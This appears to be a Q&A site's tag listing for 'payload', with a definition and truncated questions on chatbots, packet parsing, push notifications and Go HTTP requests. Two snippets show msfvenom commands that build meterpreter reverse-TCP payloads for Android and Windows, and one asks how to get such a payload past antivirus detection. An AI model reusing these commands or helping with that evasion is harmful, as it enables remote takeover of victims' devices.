Questions tagged [payload]

The part of the packet, message or code that carries the data. In information security, the term payload generally refers to the part of malicious code that performs the destructive operation.

(1) Refers to the actual data in a packet or file minus all headers attached for transport and minus all descriptive meta-data. In a network packet, headers are appended to the payload for transport and then discarded at their destination. In a key-length-value structure, the key and length are descriptive data about the value (the payload).

(2) In the analysis of malicious software such as worms, viruses and Trojans, it refers to the software's harmful results. Examples of payloads include data destruction, messages with insulting text or spurious e-mail messages sent to a large number of people.

861 questions
-2
votes
1 answer

How to add payload request for FB chatbot in python?

I have created a chatbot in python, flask, pymessenger, witai. I have added some button but I don't know how to reply back once the user press/select the option from my menu. Below is my code. @app.route('/', methods=['GET']) def verify(): if…
codekiller
  • 53
  • 1
  • 9
-2
votes
1 answer

Error in msfvenom "Error: Invalid Format Selected" for android

today after a long time I was trying to make a payload for android but I got an error there which is "Error: Invalid Format Selected" this is the command: msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.43.4 lport=4444 -f apk -o…
-2
votes
1 answer

Finding Octet in a UDP data payload in C program

I am trying to collect UDP data payload information using C program by capturing the packet from port 6343. The code I am using is as follows: #include //For standard things #include
user known
  • 31
  • 2
  • 6
-2
votes
2 answers

Examine iOS Push Notification Payload

I'm trying to figure out how I can examine the payload of a push notification in order to determine which view opens when a user opens the app from the notification. For example, if a notification says "x: test" view x would open when the…
raginggoat
  • 3,570
  • 10
  • 48
  • 108
-4
votes
0 answers

Hello everyone, I have a problem my payload detected by antiviruses

Hello antiviruses are detected my payload, I found a solution on YouTube video, but it doesn't work for me. commmands systemctl start postgresql && msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.000.000 LPORT=4445 -f exe -e…
-8
votes
2 answers

How to send JSON body in GET request golang?

There is no "body" field in documentation for http.Client.Get
1 2 3
57
58